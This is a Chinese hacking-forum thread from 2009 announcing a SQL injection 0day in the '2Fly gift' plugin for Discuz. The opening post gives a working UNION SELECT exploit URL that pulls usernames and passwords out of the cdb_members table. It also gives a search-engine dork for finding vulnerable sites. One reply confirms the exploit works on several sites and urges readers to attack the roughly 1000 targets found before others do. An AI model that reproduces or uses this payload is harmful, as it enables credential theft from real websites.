返回列表 发帖
柔肠寸断

Rank: 15Rank: 15Rank: 15Rank: 15Rank: 15

帖子
3852 
积分
13044 
威望
16780  
金钱
36761  
在线时间
1139 小时 

管理组高手勋章核心成员原创奖章帅哥勋章突出贡献奖优质人品奖章论坛元老管理组成员技术组成员
1 跳转到 » 倒序看帖
打印
tT
发表于 2009-8-14 22:35 | 只看该作者

Discuz账号发放插件注入0day

Discuz, 账号, 插件
Discuz账号发放插件注入0day
插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:


http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php
上图:

收藏 分享
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰
于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

超超

Rank: 9Rank: 9Rank: 9

帖子
561 
积分
1365 
威望
1488  
金钱
16351  
在线时间
150 小时 
2
发表于 2009-8-15 12:29 | 只看该作者
小柔 无图不真实  图片错误!!!!

TOP

学徒

Rank: 3Rank: 3

帖子
131 
积分
211 
威望
218  
金钱
162  
在线时间
18 小时 
3
发表于 2009-8-15 15:19 | 只看该作者
靠了,图片犯盗

TOP

cxy_hh

Rank: 3Rank: 3

帖子
106 
积分
174 
威望
170  
金钱
100  
在线时间
18 小时 
4
发表于 2009-8-16 23:19 | 只看该作者
本帖最后由 cxy_hh 于 2009-8-16 23:27 编辑

DZ也会有这种漏洞?这些天一个色情联盟的DZ被邪八的人搞了,人家出5W来找邪八的那个人.唉我想搞那个联盟好久了,都没搞成!菜呀!不知他用什么搞的呢,会不会是这个呢?DZ太少暴洞了
试了几个确实是可以的,不过大多数都是报gameid参数错误,百度只找到了1000多个url,要搞的话赶紧的唷,呵呵,要不就被人拿光了,呵呵

TOP

返回列表